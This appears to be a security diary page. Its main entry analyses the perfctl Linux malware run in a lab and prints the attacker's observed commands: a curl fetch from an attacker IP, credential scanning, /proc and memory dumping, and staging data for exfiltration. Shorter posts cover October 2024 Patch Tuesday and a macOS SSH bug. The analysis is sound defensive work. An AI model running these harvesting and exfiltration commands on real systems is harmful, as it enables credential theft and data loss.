From Perfctl to InfoStealer
A few days ago, a new stealthy malware targeting Linux hosts made a lot of noise: perfctl[1]. The malware has been pretty well analyzed and I won’t repeat what has been already disclosed. I found a copy of the "httpd" binary (SHA256:22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13)[2]. I dropped the malware in my lab to see how it detonated. I infected the lab without root privileges and detected the same behavior except files were not written to some locations due to a lack of access (not root). When executing without root privileges, the rootkit feature is unavailable and the malware runs "disclosed".
After the sandbox infection, I had two running processes:
- perfctl
- gnome-session-binary (This name can be different and mimic well-known Linux processes)
The resources used by the two processes are:
remnux@remnux:/$ sudo lsof -p 2637 COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME gnome-ses 2637 remnux cwd DIR 8,5 4096 1967470 /var/tmp/test gnome-ses 2637 remnux rtd DIR 8,5 4096 2 / gnome-ses 2637 remnux txt REG 8,5 9301499 2498448 /tmp/.perf.c/gnome-session-binary (deleted) gnome-ses 2637 remnux mem REG 8,5 21444668 794483 /tmp/.xdiag/tordata/cached-microdescs gnome-ses 2637 remnux mem REG 8,5 3552 2245832 /usr/share/zoneinfo/America/New_York gnome-ses 2637 remnux 0r CHR 1,3 0t0 6 /dev/null gnome-ses 2637 remnux 1w CHR 1,3 0t0 6 /dev/null gnome-ses 2637 remnux 2w CHR 1,3 0t0 6 /dev/null gnome-ses 2637 remnux 3u IPv4 186838 0t0 TCP remnux:44010->tor-exit-read-me.dfri.se:http (ESTABLISHED) gnome-ses 2637 remnux 4u a_inode 0,14 0 12517 [eventpoll] gnome-ses 2637 remnux 5r FIFO 0,13 0t0 58960 pipe gnome-ses 2637 remnux 6w FIFO 0,13 0t0 58960 pipe gnome-ses 2637 remnux 7u unix 0xffff8b2abaa0dc00 0t0 71705 type=STREAM gnome-ses 2637 remnux 8u unix 0xffff8b2abaa09800 0t0 58991 /tmp/.xdiag/int/.per.s type=STREAM gnome-ses 2637 remnux 9u unix 0xffff8b2abaa0e000 0t0 71704 type=STREAM gnome-ses 2637 remnux 10u a_inode 0,14 0 12517 [eventpoll] gnome-ses 2637 remnux 11r FIFO 0,13 0t0 71706 pipe gnome-ses 2637 remnux 12w FIFO 0,13 0t0 71706 pipe gnome-ses 2637 remnux 13uW REG 8,5 0 794471 /tmp/.xdiag/tordata/lock gnome-ses 2637 remnux 14u IPv4 68064 0t0 TCP localhost:37959 (LISTEN) gnome-ses 2637 remnux 15u IPv4 71708 0t0 TCP localhost:63582 (LISTEN) gnome-ses 2637 remnux 16u IPv4 187544 0t0 TCP localhost:44870->localhost:46606 (ESTABLISHED) gnome-ses 2637 remnux 17u IPv4 187546 0t0 TCP localhost:48816->localhost:63582 (ESTABLISHED) gnome-ses 2637 remnux 18u IPv4 187547 0t0 TCP localhost:63582->localhost:48816 (ESTABLISHED) gnome-ses 2637 remnux 19u IPv4 68080 0t0 TCP remnux:42126->tor-exit.exs.no:https (ESTABLISHED) gnome-ses 2637 remnux 20r FIFO 0,13 0t0 187612 pipe gnome-ses 2637 remnux 21u IPv4 71788 0t0 TCP localhost:44870 (LISTEN) gnome-ses 2637 remnux 22u IPv4 71790 0t0 TCP localhost:44869 (LISTEN) gnome-ses 2637 remnux 23w FIFO 0,13 0t0 187612 pipe gnome-ses 2637 remnux 24r FIFO 0,13 0t0 187613 pipe gnome-ses 2637 remnux 25w FIFO 0,13 0t0 187613 pipe remnux@remnux:/$ sudo lsof -p 2791 COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME perfctl 2791 remnux cwd DIR 8,5 4096 2 / perfctl 2791 remnux rtd DIR 8,5 4096 2 / perfctl 2791 remnux txt REG 8,5 1727132 2498457 /tmp/.perf.c/perfctl perfctl 2791 remnux 0r CHR 1,3 0t0 6 /dev/null perfctl 2791 remnux 1w CHR 1,3 0t0 6 /dev/null perfctl 2791 remnux 2w CHR 1,3 0t0 6 /dev/null perfctl 2791 remnux 3u a_inode 0,14 0 12517 [eventpoll] perfctl 2791 remnux 4r FIFO 0,13 0t0 68184 pipe perfctl 2791 remnux 5w FIFO 0,13 0t0 68184 pipe perfctl 2791 remnux 6r FIFO 0,13 0t0 71857 pipe perfctl 2791 remnux 7u unix 0xffff8b2abaa0dc00 0t0 71705 type=STREAM perfctl 2791 remnux 8w FIFO 0,13 0t0 71857 pipe perfctl 2791 remnux 9u a_inode 0,14 0 12517 [eventfd] perfctl 2791 remnux 10u a_inode 0,14 0 12517 [eventfd] perfctl 2791 remnux 11u a_inode 0,14 0 12517 [eventfd] perfctl 2791 remnux 12r CHR 1,3 0t0 6 /dev/null perfctl 2791 remnux 13u IPv4 186859 0t0 TCP localhost:46606->localhost:44870 (ESTABLISHED)
That's exactly what has been described in the initial malware analysis: Tor is used for external communications and inter-process communications ate performed via sockets:
tor-exit-read-me.dfri.se:443 <-> (:42126) gnome-session-binary (127.0.0.1:46606) <-> (127.0.0.1:44870) perfctl
The malware also implants a backdoor allowing remote access to the Attacker.
Indeed, after approximately 30 minutes, I saw more activity ongoing. The Attacker dropped and executed a bunch of scripts to perform a footprint of the compromised host, search for interesting files/credentials, and exfiltrate them. All files were dropped in a sub-directory in the infected user's home directory:
remnux@remnux:~/.atmp/tmp/.applocal.xdiag$ ls -al total 2752 drwx------ 1 remnux remnux 32768 8 Oct 14:34 . drwx------ 1 remnux remnux 32768 8 Oct 10:03 .. -rwx------ 1 remnux remnux 36 8 Oct 09:26 aa.txt -rwx------ 1 remnux remnux 0 8 Oct 09:06 cloud_meta.txt -rwx------ 1 remnux remnux 64 8 Oct 09:26 debug.txt drwx------ 1 remnux remnux 32768 8 Oct 09:07 docker -rwx------ 1 remnux remnux 7745 8 Oct 09:24 environs.txt -rwx------ 1 remnux remnux 208084 8 Oct 09:07 files.txt drwx------ 1 remnux remnux 32768 8 Oct 09:20 files_other drwx------ 1 remnux remnux 32768 8 Oct 09:20 files_th -rwx------ 1 remnux remnux 0 8 Oct 09:13 foi.cry.txt -rwx------ 1 remnux remnux 0 8 Oct 09:13 foi.fds.txt -rwx------ 1 remnux remnux 612 8 Oct 09:13 foi.fs.txt -rwx------ 1 remnux remnux 0 8 Oct 09:24 foi.varlib.txt -rwx------ 1 remnux remnux 29994 8 Oct 09:24 foi.xy.txt -rwx------ 1 remnux remnux 49776 8 Oct 09:06 host.txt -rwx------ 1 remnux remnux 0 8 Oct 09:06 i1run1dmen -rwx------ 1 remnux remnux 6592 8 Oct 09:06 local_users.txt -rwx------ 1 remnux remnux 2682 8 Oct 09:06 modules.txt -rwx------ 1 remnux remnux 3705 8 Oct 09:06 net.txt -rwx------ 1 remnux remnux 124006 8 Oct 09:24 process.env.txt -rwx------ 1 remnux remnux 20141 8 Oct 09:24 process.mem.txt -rwx------ 1 remnux remnux 470494 8 Oct 14:54 rex.filepaths.large-1.txt -rwx------ 1 remnux remnux 0 8 Oct 09:26 rver1 -rwx------ 1 remnux remnux 2370 8 Oct 09:08 th.filesystem.secrets.found.txt
To analyze the malware behavior, I used kunai[3] to record the system activity.
The main tool downloaded is TruffleHog[4], a well-known credentials scanner that can scan many different local or remote places. The file was downloaded from the official repository:
curl -m 1800 -fsSLk hxxps://github[.]com/trufflesecurity/trufflehog/releases/download/v3.78.2/trufflehog_3.78.2_linux_amd64.tar.gz -o th.tar.gz tar zxvf th.tar.gz trufflehog chmod +x trufflehog ./trufflehog --help mv trufflehog thg xargs -0 ./thg --concurrency=2 --no-update --no-verification --include-detectors=all filesystem rm -f thg
I'm not sure if the scan was launched automatically or by a human: Why the TruffleHog binary was executed with the "--help" parameter? Strange.
Here is the result file:
remnux@remnux:~/.atmp/tmp/.applocal.xdiag$ cat th.filesystem.secrets.found.txt Found unverified result ??? Detector Type: URI Decoder Type: PLAIN Raw result: http://jschmoe:xyzzy@www.bogus.net:8000 File: /opt/procdot/plugins/pcap_tools/tcl/tcl8/http-2.8.7.tm Line: 413 Found unverified result ??? Detector Type: URI Decoder Type: PLAIN Raw result: http://jschmoe:xyzzy@www.bogus.net:8000 File: /opt/procdot/plugins/pcap_tools/tcl/tcl8/http-2.8.7.tm Line: 28 Found unverified result ??? Verification issue: More than one detector has found this result. For your safety, verification has been disabled.You can override this behavior by using the --allow-verification-overlap flag. Detector Type: FTP Decoder Type: PLAIN Raw result: ftp://joe:password@proxy.example.com File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/urllib2.py Line: 105 Found unverified result ??? Detector Type: URI Decoder Type: PLAIN Raw result: http://joe:password@proxy.example.com File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/urllib2.py Line: 98 Found unverified result ??? Detector Type: URI Decoder Type: PLAIN Raw result: http://joe:password@proxy.example.com:3128 File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/urllib2.py Line: 100 Found unverified result ??? Detector Type: URI Decoder Type: PLAIN Raw result: http://joe:password@proxy.example.com File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/urllib2.py Line: 98 Found unverified result ??? Detector Type: JDBC Decoder Type: PLAIN Raw result: jdbc:mysql://localhost/ziclix File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/dbexts.py Line: 30 Found unverified result ??? Detector Type: JDBC Decoder Type: PLAIN Raw result: jdbc:postgresql://localhost:5432/ziclix File: /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.3/Lib/dbexts.py Line: 38 Found unverified result ??? Detector Type: Github Decoder Type: PLAIN Raw result: 9813cde2db1f31f92fed49a4dd8aa29b21d72581 Rotation_guide: https://howtorotate.com/docs/tutorials/github/ Version: 1 File: /opt/ghidra/Ghidra/application.properties Line: 10 Found unverified result ??? Detector Type: Github Decoder Type: PLAIN Raw result: 44ca5b263a955ba19ec4f57a5646d4a406a34f70 Rotation_guide: https://howtorotate.com/docs/tutorials/github/ Version: 1 File: /opt/ghidra/Ghidra/application.properties Line: 11
The next step was to search for interesting files using a dictionary downloaded from the following URL:
curl -m 1800 -fsSLk hxxp://104[.]183[.]100[.]189/common/backup.list -o rex.filepaths.large-1.txt
The download file contains 19K+ regular expressions to match juicy files on a file system. Example:
... /09-managing-state/end/vue-heroes/\.env$ /0-flannel\.conf$ /0\.htpasswd$ /0loginlog$ /10-flannel\.conf$ /1C/conf$ /1C/config$ /1confirmssr\.htm$ /1\.htpasswd$ /1loginlog$ /1password$ /2004conference$ /2009-conference$ /2015/kj/config\.js$ /2019/wp-login\.php$ /2020/wp-login\.php$ /2021/wp-login\.php$ /2loginlog$ /31_structure_tests/\.env$ /3digitcode\.php$ /3loginlog$ /3-sequelize/final/\.env$ ...
The Attacker searched for many regular expressions and more in the list of discovered files. Then, he/she parsed also the /proc file system for interesting processes:
ls -l /proc/1327/exe grep -s -q KMHt5Ykyq3ZkgI8CZ /proc/1327/cmdline grep -s -q 5Y4B2Se2L4VPL6Z5nKMgIv5Ih3+oxkb5EqmzE768BFo= /proc/1327/cmdline cat /proc/1327/environ cat /proc/1327/cmdline cat /proc/1327/maps
He/she also scrapped the processes' memory for interesting data by performing multiple dumps of the memory:
dd if=/proc/1327/mem bs=4096 iflag=skip_bytes,count_bytes skip=94423105585152 count=4096
Potential dockers were also inspected:
docker images docker ps docker ps -a
The malware replicated itself multiple times by creating new binaries:
cp /proc/62759/exe /tmp/.perf.c/ibus-x11 cp /proc/63602/exe /tmp/.perf.c/gnome-session-ctl cp /proc/64431/exe /tmp/.perf.c/ibus-daemon cp /proc/65271/exe /tmp/.perf.c/ibus-x11 cp /proc/6549/exe /tmp/.perf.c/pulseaudio cp /proc/66088/exe /tmp/.perf.c/vmtoolsd cp /proc/66919/exe /tmp/.perf.c/ibus-daemon cp /proc/67754/exe /tmp/.perf.c/ibus-x11 cp /proc/68583/exe /tmp/.perf.c/jq cp /proc/69428/exe /tmp/.perf.c/systemd cp /proc/70242/exe /tmp/.perf.c/ssh-agent cp /proc/71046/exe /tmp/.perf.c/python3 cp /proc/71062/exe /dev/shm/libfsnldev.so cp /proc/71062/exe /dev/shm/libpprocps.so cp /proc/71062/exe /lib/libfsnldev.so cp /proc/71062/exe /lib/libpprocps.so cp /proc/7411/exe /tmp/.perf.c/systemd cp /proc/8248/exe /tmp/.perf.c/ibus-x11 cp /proc/9084/exe /tmp/.perf.c/ibus-x11 cp /proc/9914/exe /tmp/.perf.c/systemd
Once all details are collected, they are stored in a Tar archive and exfiltrated:
trunk.6f7794aa1bd1b2b8d26eb2eae5f8df37_169.155.242.252_.tar.gz
Conclusion: If just a "simple" cryptominer seems to be deployed by Attackers, they can also steal your data and probably abuse your compromised hosts in many different ways!
[1] https://www.aquasec.com/blog/perfctl-a-stealthy-malware-targeting-millions-of-linux-servers/
[2] https://www.virustotal.com/gui/file/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
[3] https://isc.sans.edu/diary/Kunai+Keep+an+Eye+on+your+Linux+Hosts+Activity/31054
[4] https://github.com/trufflesecurity/trufflehog
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Microsoft Patch Tuesday - October 2024
Microsoft today released patches for 117 vulnerabilities. Three additional vulnerabilities apply to Chromium/Edge. Another three vulnerabilities are rated critical.
Five of the vulnerabilities were disclosed before today. Two vulnerabilities were not only disclosed but also exploited, according to Microsoft
Notable Vulnerabilities:
Microsoft Management Console Remote Code Execution Vulnerability (CVE-2024-43572)
To Exploit this vulnerability, the attacker must convince the victim to open a malicious file.
Open Source Curl Remote Code Execution Vulnerability (CVE-2024-6197)
This vulnerability was disclosed and patched in libcurl back in July. Accordng to curl.se, the most likely outcome is a crash, but code execution can not be ruled out.
Windows Hyper-V Security Feature Bypass Vulnerability (CVE-2024-20659)
The vulnerability allows an attacker to bypass the UEFI on the host machine and compromise the hypervisor and the secure kernel. Exploitation requires a reboot at the right time.
Windows MSHTML Platform Spoofing Vulnerability (CVE-2024-43573)
yet another Windows MSHTML Platform Spoofing vulnerability. Fourth 0-day just this year in this component. APT actors usually use these issues to make downloading and executing malware more likely.
Description | |||||||
---|---|---|---|---|---|---|---|
CVE | Disclosed | Exploited | Exploitability (old versions) | current version | Severity | CVSS Base (AVG) | CVSS Temporal (AVG) |
.NET and Visual Studio Denial of Service Vulnerability | |||||||
%%cve:2024-43485%% | No | No | - | - | Important | 7.5 | 6.5 |
.NET and Visual Studio Remote Code Execution Vulnerability | |||||||
%%cve:2024-38229%% | No | No | - | - | Important | 8.1 | 7.1 |
.NET, .NET Framework, and Visual Studio Denial of Service Vulnerability | |||||||
%%cve:2024-43483%% | No | No | - | - | Important | 7.5 | 6.5 |
%%cve:2024-43484%% | No | No | - | - | Important | 7.5 | 6.5 |
Azure Command Line Integration (CLI) Elevation of Privilege Vulnerability | |||||||
%%cve:2024-43591%% | No | No | - | - | Important | 8.7 | 7.6 |
Azure Monitor Agent Elevation of Privilege Vulnerability | |||||||
%%cve:2024-38097%% | No | No | - | - | Important | 7.1 | 6.2 |
Azure Service Fabric for Linux Remote Code Execution Vulnerability | |||||||
%%cve:2024-43480%% | No | No | - | - | Important | 6.6 | 5.8 |
Azure Stack Hyperconverged Infrastructure (HCI) Elevation of Privilege Vulnerability | |||||||
%%cve:2024-38179%% | No | No | - | - | Important | 8.8 | 7.7 |
BitLocker Security Feature Bypass Vulnerability | |||||||
%%cve:2024-43513%% | No | No | - | - | Important | 6.4 | 5.6 |
BranchCache Denial of Service Vulnerability | |||||||
%%cve:2024-43506%% | No | No | - | - | Important | 7.5 | 6.5 |
%%cve:2024-38149%% | No | No | - | - | Important | 7.5 | 6.5 |
Chromium: CVE-2024-7025 Integer overflow in Layout | |||||||
%%cve:2024-7025%% | No | No | - | - | - | ||
Chromium: CVE-2024-9369 Insufficient data validation in Mojo | |||||||
%%cve:2024-9369%% | No | No | - | - | - | ||
Chromium: CVE-2024-9370 Inappropriate implementation in V8 | |||||||
%%cve:2024-9370%% | No | No | - | - | - | ||
Code Integrity Guard Security Feature Bypass Vulnerability | |||||||
%%cve:2024-43585%% | No | No | - | - | Important | 5.5 | 4.8 |
DeepSpeed Remote Code Execution Vulnerability | |||||||
%%cve:2024-43497%% | No | No | - | - | Important | 8.4 | 7.3 |
Internet Small Computer Systems Interface (iSCSI) Denial of Service Vulnerability | |||||||
%%cve:2024-43515%% | No | No | - | - | Important | 7.5 | 6.5 |
Microsoft ActiveX Data Objects Remote Code Execution Vulnerability | |||||||
%%cve:2024-43517%% | No | No | - | - | Important | 8.8 | 7.7 |
Microsoft Configuration Manager Remote Code Execution Vulnerability | |||||||
%%cve:2024-43468%% | No | No | - | - | Critical | 9.8 | 8.5 |
Microsoft Defender for Endpoint for Linux Spoofing Vulnerability | |||||||
%%cve:2024-43614%% | No | No | - | - | Important | 5.5 | 4.8 |
Microsoft Excel Remote Code Execution Vulnerability | |||||||
%%cve:2024-43504%% | No | No | - | - | Important | 7.8 | 6.8 |
Microsoft Management Console Remote Code Execution Vulnerability | |||||||
%%cve:2024-43572%% | Yes | Yes | - | - | Important | 7.8 | 7.2 |
Microsoft Office Remote Code Execution Vulnerability | |||||||
%%cve:2024-43576%% | No | No | - | - | Important | 7.8 | 6.8 |
%%cve:2024-43616%% | No | No | - | - | Important | 7.8 | 6.8 |
Microsoft Office Spoofing Vulnerability | |||||||
%%cve:2024-43609%% | No | No | - | - | Important | 6.5 | 5.7 |
Microsoft Office Visio Remote Code Execution Vulnerability | |||||||
%%cve:2024-43505%% | No | No | - | - | Important | 7.8 | 6.8 |
Microsoft OpenSSH for Windows Remote Code Execution Vulnerability | |||||||
%%cve:2024-43581%% | No | No | - | - | Important | 7.1 | 6.2 |
%%cve:2024-43615%% | No | No | - | - | Important | 7.1 | 6.2 |
%%cve:2024-38029%% | No | No | - | - | Important | 7.5 | 6.5 |
Microsoft SharePoint Elevation of Privilege Vulnerability | |||||||
%%cve:2024-43503%% | No | No | - | - | Important | 7.8 | 6.8 |
Microsoft Simple Certificate Enrollment Protocol Denial of Service Vulnerability | |||||||
%%cve:2024-43541%% | No | No | - | - | Important | 7.5 | 6.5 |
%%cve:2024-43544%% | No | No | - | - | Important | 7.5 | 6.5 |
Microsoft Speech Application Programming Interface (SAPI) Remote Code Execution Vulnerability | |||||||
%%cve:2024-43574%% | No | No | - | - | Important | 8.3 | 7.2 |
Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability | |||||||
%%cve:2024-43519%% | No | No | - | - | Important | 8.8 | 7.7 |
Microsoft Windows Storage Port Driver Elevation of Privilege Vulnerability | |||||||
%%cve:2024-43560%% | No | No | - | - | Important | 7.8 | 6.8 |
NT OS Kernel Elevation of Privilege Vulnerability | |||||||
%%cve:2024-43553%% | No | No | - | - | Important | 7.4 | 6.4 |
Open Source Curl Remote Code Execution Vulnerability | |||||||
%%cve:2024-6197%% | Yes | No | - | - | Important | 8.8 | 7.7 |
Outlook for Android Elevation of Privilege Vulnerability | |||||||
%%cve:2024-43604%% | No | No | - | - | Important | 5.7 | 5.0 |
Power BI Report Server Spoofing Vulnerability | |||||||
%%cve:2024-43481%% | No | No | - | - | Important | 6.5 | 5.7 |
%%cve:2024-43612%% | No | No | - | - | Important | 6.9 | 6.0 |
Remote Desktop Client Remote Code Execution Vulnerability | |||||||
%%cve:2024-43533%% | No | No | - | - | Important | 8.8 | 7.7 |
%%cve:2024-43599%% | No | No | - | - | Important | 8.8 | 7.7 |
Remote Desktop Protocol Server Remote Code Execution Vulnerability | |||||||
%%cve:2024-43582%% | No | No | - | - | Critical | 8.1 | 7.1 |
Remote Registry Service Elevation of Privilege Vulnerability | |||||||
%%cve:2024-43532%% | No | No | - | - | Important | 8.8 | 7.7 |
Sudo for Windows Spoofing Vulnerability | |||||||
%%cve:2024-43571%% | No | No | - | - | Important | 5.6 | 4.9 |
Visual C++ Redistributable Installer Elevation of Privilege Vulnerability | |||||||
%%cve:2024-43590%% | No | No | - | - | Important | 7.8 | 6.8 |
Visual Studio Code extension for Arduino Remote Code Execution Vulnerability | |||||||
%%cve:2024-43488%% | No | No | - | - | Critical | 8.8 | 7.7 |
Visual Studio Code for Linux Remote Code Execution Vulnerability | |||||||
%%cve:2024-43601%% | No | No | - | - | Important | 7.1 | 6.2 |
Visual Studio Collector Service Denial of Service Vulnerability | |||||||
%%cve:2024-43603%% | No | No | - | - | Important | 5.5 | 4.8 |
Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | |||||||
%%cve:2024-43563%% | No | No | - | - | Important | 7.8 | 6.8 |
Windows Common Log File System Driver Elevation of Privilege Vulnerability | |||||||
%%cve:2024-43501%% | No | No | - | - | Important | 7.8 | 6.8 |
Windows Cryptographic Information Disclosure Vulnerability | |||||||
%%cve:2024-43546%% | No | No | - | - | Important | 5.6 | 4.9 |
Windows Graphics Component Elevation of Privilege Vulnerability | |||||||
%%cve:2024-43509%% | No | No | - | - | Important | 7.8 | 6.8 |
%%cve:2024-43556%% | No | No | - | - | Important | 7.8 | 6.8 |
Windows Graphics Component Information Disclosure Vulnerability | |||||||
%%cve:2024-43508%% | No | No | - | - | Important | 5.5 | 4.8 |
%%cve:2024-43534%% | No | No | - | - | Important | 6.5 | 5.7 |
Windows Hyper-V Denial of Service Vulnerability | |||||||
%%cve:2024-43521%% | No | No | - | - | Important | 7.5 | 6.5 |
%%cve:2024-43567%% | No | No | - | - | Important | 7.5 | 6.5 |
%%cve:2024-43575%% | No | No | - | - | Important | 7.5 | 6.5 |
Windows Hyper-V Remote Code Execution Vulnerability | |||||||
%%cve:2024-30092%% | No | No | - | - | Important | 8.0 | 7.0 |
Windows Hyper-V Security Feature Bypass Vulnerability | |||||||
%%cve:2024-20659%% | Yes | No | - | - | Important | 7.1 | 6.6 |
Windows Kerberos Elevation of Privilege Vulnerability | |||||||
%%cve:2024-38129%% | No | No | - | - | Important | 7.5 | 6.5 |
Windows Kerberos Information Disclosure Vulnerability | |||||||
%%cve:2024-43547%% | No | No | - | - | Important | 6.5 | 5.7 |
Windows Kernel Denial of Service Vulnerability | |||||||
%%cve:2024-43520%% | No | No | - | - | Important | 5.0 | 4.4 |
Windows Kernel Elevation of Privilege Vulnerability | |||||||
%%cve:2024-43502%% | No | No | - | - | Important | 7.1 | 6.2 |
%%cve:2024-43527%% | No | No | - | - | Important | 7.8 | 6.8 |
%%cve:2024-37979%% | No | No | - | - | Important | 6.7 | 5.8 |
%%cve:2024-43511%% | No | No | - | - | Important | 7.0 | 6.1 |
%%cve:2024-43570%% | No | No | - | - | Important | 6.4 | 5.6 |
Windows Kernel-Mode Driver Elevation of Privilege Vulnerability | |||||||
%%cve:2024-43535%% | No | No | - | - | Important | 7.0 | 6.1 |
Windows Kernel-Mode Driver Information Disclosure Vulnerability | |||||||
%%cve:2024-43554%% | No | No | - | - | Important | 5.5 | 4.8 |
Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability | |||||||
%%cve:2024-43522%% | No | No | - | - | Important | 7.0 | 6.1 |
Windows MSHTML Platform Spoofing Vulnerability | |||||||
%%cve:2024-43573%% | Yes | Yes | - | - | Moderate | 6.5 | 6.0 |
Windows Mobile Broadband Driver Denial of Service Vulnerability | |||||||
%%cve:2024-43537%% | No | No | - | - | Important | 6.5 | 5.7 |
%%cve:2024-43538%% | No | No | - | - | Important | 6.5 | 5.7 |
%%cve:2024-43540%% | No | No | - | - | Important | 6.5 | 5.7 |
%%cve:2024-43542%% | No | No | - | - | Important | 6.5 | 5.7 |
%%cve:2024-43555%% | No | No | - | - | Important | 6.5 | 5.7 |
%%cve:2024-43557%% | No | No | - | - | Important | 6.5 | 5.7 |
%%cve:2024-43558%% | No | No | - | - | Important | 6.5 | 5.7 |
%%cve:2024-43559%% | No | No | - | - | Important | 6.5 | 5.7 |
%%cve:2024-43561%% | No | No | - | - | Important | 6.5 | 5.7 |
Windows Mobile Broadband Driver Remote Code Execution Vulnerability | |||||||
%%cve:2024-43525%% | No | No | - | - | Important | 6.8 | 5.9 |
%%cve:2024-43526%% | No | No | - | - | Important | 6.8 | 5.9 |
%%cve:2024-43543%% | No | No | - | - | Important | 6.8 | 5.9 |
%%cve:2024-43523%% | No | No | - | - | Important | 6.8 | 5.9 |
%%cve:2024-43524%% | No | No | - | - | Important | 6.8 | 5.9 |
%%cve:2024-43536%% | No | No | - | - | Important | 6.8 | 5.9 |
Windows Netlogon Elevation of Privilege Vulnerability | |||||||
%%cve:2024-38124%% | No | No | - | - | Important | 9.0 | 7.8 |
Windows Network Address Translation (NAT) Denial of Service Vulnerability | |||||||
%%cve:2024-43562%% | No | No | - | - | Important | 7.5 | 6.5 |
%%cve:2024-43565%% | No | No | - | - | Important | 7.5 | 6.5 |
Windows Online Certificate Status Protocol (OCSP) Server Denial of Service Vulnerability | |||||||
%%cve:2024-43545%% | No | No | - | - | Important | 7.5 | 6.5 |
Windows Print Spooler Elevation of Privilege Vulnerability | |||||||
%%cve:2024-43529%% | No | No | - | - | Important | 7.3 | 6.4 |
Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability | |||||||
%%cve:2024-38262%% | No | No | - | - | Important | 7.5 | 6.5 |
Windows Remote Desktop Services Tampering Vulnerability | |||||||
%%cve:2024-43456%% | No | No | - | - | Important | 4.8 | 4.2 |
Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability | |||||||
%%cve:2024-43514%% | No | No | - | - | Important | 7.8 | 6.8 |
Windows Resilient File System (ReFS) Information Disclosure Vulnerability | |||||||
%%cve:2024-43500%% | No | No | - | - | Important | 5.5 | 4.8 |
Windows Resume Extensible Firmware Interface Security Feature Bypass Vulnerability | |||||||
%%cve:2024-37976%% | No | No | - | - | Important | 6.7 | 5.8 |
%%cve:2024-37982%% | No | No | - | - | Important | 6.7 | 5.8 |
%%cve:2024-37983%% | No | No | - | - | Important | 6.7 | 5.8 |
Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability | |||||||
%%cve:2024-38261%% | No | No | - | - | Important | 7.8 | 6.8 |
%%cve:2024-43608%% | No | No | - | - | Important | 8.8 | 7.7 |
%%cve:2024-43607%% | No | No | - | - | Important | 8.8 | 7.7 |
%%cve:2024-38265%% | No | No | - | - | Important | 8.8 | 7.7 |
%%cve:2024-43453%% | No | No | - | - | Important | 8.8 | 7.7 |
%%cve:2024-38212%% | No | No | - | - | Important | 8.8 | 7.7 |
%%cve:2024-43549%% | No | No | - | - | Important | 8.8 | 7.7 |
%%cve:2024-43564%% | No | No | - | - | Important | 8.8 | 7.7 |
%%cve:2024-43589%% | No | No | - | - | Important | 8.8 | 8.1 |
%%cve:2024-43592%% | No | No | - | - | Important | 8.8 | 7.7 |
%%cve:2024-43593%% | No | No | - | - | Important | 8.8 | 7.7 |
%%cve:2024-43611%% | No | No | - | - | Important | 8.8 | 7.7 |
Windows Scripting Engine Security Feature Bypass Vulnerability | |||||||
%%cve:2024-43584%% | No | No | - | - | Important | 7.7 | 6.7 |
Windows Secure Channel Spoofing Vulnerability | |||||||
%%cve:2024-43550%% | No | No | - | - | Important | 7.4 | 6.4 |
Windows Secure Kernel Mode Elevation of Privilege Vulnerability | |||||||
%%cve:2024-43516%% | No | No | - | - | Important | 7.8 | 6.8 |
%%cve:2024-43528%% | No | No | - | - | Important | 7.8 | 6.8 |
Windows Shell Remote Code Execution Vulnerability | |||||||
%%cve:2024-43552%% | No | No | - | - | Important | 7.3 | 6.4 |
Windows Standards-Based Storage Management Service Denial of Service Vulnerability | |||||||
%%cve:2024-43512%% | No | No | - | - | Important | 6.5 | 5.7 |
Windows Storage Elevation of Privilege Vulnerability | |||||||
%%cve:2024-43551%% | No | No | - | - | Important | 7.8 | 6.8 |
Windows Telephony Server Remote Code Execution Vulnerability | |||||||
%%cve:2024-43518%% | No | No | - | - | Important | 8.8 | 7.7 |
Winlogon Elevation of Privilege Vulnerability | |||||||
%%cve:2024-43583%% | Yes | No | - | - | Important | 7.8 | 6.8 |
---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|
0 Comments
macOS Sequoia: System/Network Admins, Hold On!
It's always tempting to install the latest releases of your preferred software and operating systems. After all, that's the message we pass to our beloved users: "Patch, patch, and patch again!". Last week, I was teaching for SANS and decided to not upgrade my MacBook to macOS 15.0 (Sequoia). Today, I had nothing critical scheduled and made the big jump. Upgrading the operating system is always stressful but everything ran smoothly. So far so good...
Later, I started to do my regular geek tasks and connected to several SSH hosts. After a random amount of time, I noticed the following error for many connections:
ssh_dispatch_run_fatal: Connection to x.x.x.x port 22: Connection corrupted
This happened multiple times. I started to google for some users' feedback and experiences. It seems to be a problem faced by many people. What I've read:
- It happens randomly
- It affects IPv4 / IPv6
- Not related to an SSH client (term, iTerm2, same)
- People who upgraded to 15.0.1 have less frequent disconnections but the problem is not solved yet
- Some recommendations (worked for some users)
- Disable the macOS firewall
- Turn off "Limit IP address tracking
- Disable private rotating MAC
- Disable tools like LittleSnitch
There is no "magic recipe" to fix the issue. On my Mac, disabling the address tracking did the job. I've now an SSH session open for 2h+.
Many forums are covering this topic. The most complete one I found is on the Apple support forum[1]. In conclusion, if SSH is a critical protocol for you, maybe hold on before upgrading your macOS.
Tip: If you need to SSH to a host, be sure to start your shell in a "screen" (or Byobu, ... ) session[2] to not lose your work.
[1] https://discussions.apple.com/thread/255761702?sortBy=rank&page=1
[2] https://ss64.com/bash/screen.html
Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
0 Comments
Survey of CUPS exploit attempts
It is about a week since the release of the four CUPS remote code execution vulnerabilities. After the vulnerabilities became known, I configured one of our honeypots that watches a larger set of IPs to specifically collect UDP packets to port 631. Here is a quick summary of the results.
